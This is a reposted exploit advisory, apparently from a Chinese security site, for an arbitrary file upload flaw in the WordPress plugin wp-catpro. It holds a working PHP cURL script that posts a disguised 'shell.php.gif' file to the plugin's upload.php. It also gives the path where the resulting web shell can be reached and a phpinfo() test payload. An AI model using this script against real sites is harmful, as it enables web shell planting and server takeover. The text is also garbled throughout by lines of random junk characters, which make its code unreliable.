WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
7 g! U5 G; B  b  X, `+ m
- H: U: t9 T% V; X" J作者  => Zikou-16
- A; l# V) J# ?( y& A+ b邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
9 r0 J5 H& x, ^( O' o6 M下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
3 t- t# r( Q9 U4 _6 C####
! m, {! P9 ~% a+ H* }; V' ^- M2 h
! `& S% z3 F' ^2 |' }2 J. N" q  B#=> Exploit 信息:
4 g- E* k7 f+ M# E------------------
# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# B3 A/ @9 s) u/ Z8 A# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
( {6 \3 q9 M5 l- u# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
/ s! K& Y. _0 I" p2 u; [+ _  l------------------
5 H3 N5 f0 M2 p/ b! ?
#=> Exploit
$ J, @9 e( S* s- [! T-----------
<?php

% g) [- W2 l; L7 `8 d$uploadfile="zik.php.gif";
$ f/ B7 ]  d# |4 ]& s$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
0 Z% X5 [' [0 ycurl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
. @" ?: h+ e& ?array('Filedata'=>"@$uploadfile",
; g8 D/ {! s$ v, u6 u'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
5 u& b* X; Q  R7 ]
print "$postResult";
9 ]$ H$ h. t6 ~
: H, Y' o) F& Y1 {4 ], B4 CShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
# W" t2 _2 d$ a+ B# W' t8 q  ?>
<?php
7 \  f& f1 A9 O# }2 D5 W; [phpinfo();
?>